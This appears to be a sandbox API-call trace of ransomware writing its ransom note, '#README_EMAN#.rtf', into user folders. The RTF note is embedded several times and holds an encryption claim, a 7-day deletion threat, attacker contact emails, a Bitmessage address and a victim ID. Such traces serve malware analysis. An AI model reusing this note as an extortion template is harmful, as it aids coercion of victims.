\\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0294.062] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x235cca8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0294.062] WriteFile (in: hFile=0x2d4, lpBuffer=0x235cca8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x235cca8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0294.064] CloseHandle (hObject=0x2d4) returned 1 [0294.064] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\#readme_eman#.rtf")) returned 0x20 [0294.064] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\adm\\#readme_eman#.rtf")) returned 0xffffffff [0294.064] GetLastError () returned 0x2 [0294.064] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\adm\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0294.132] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 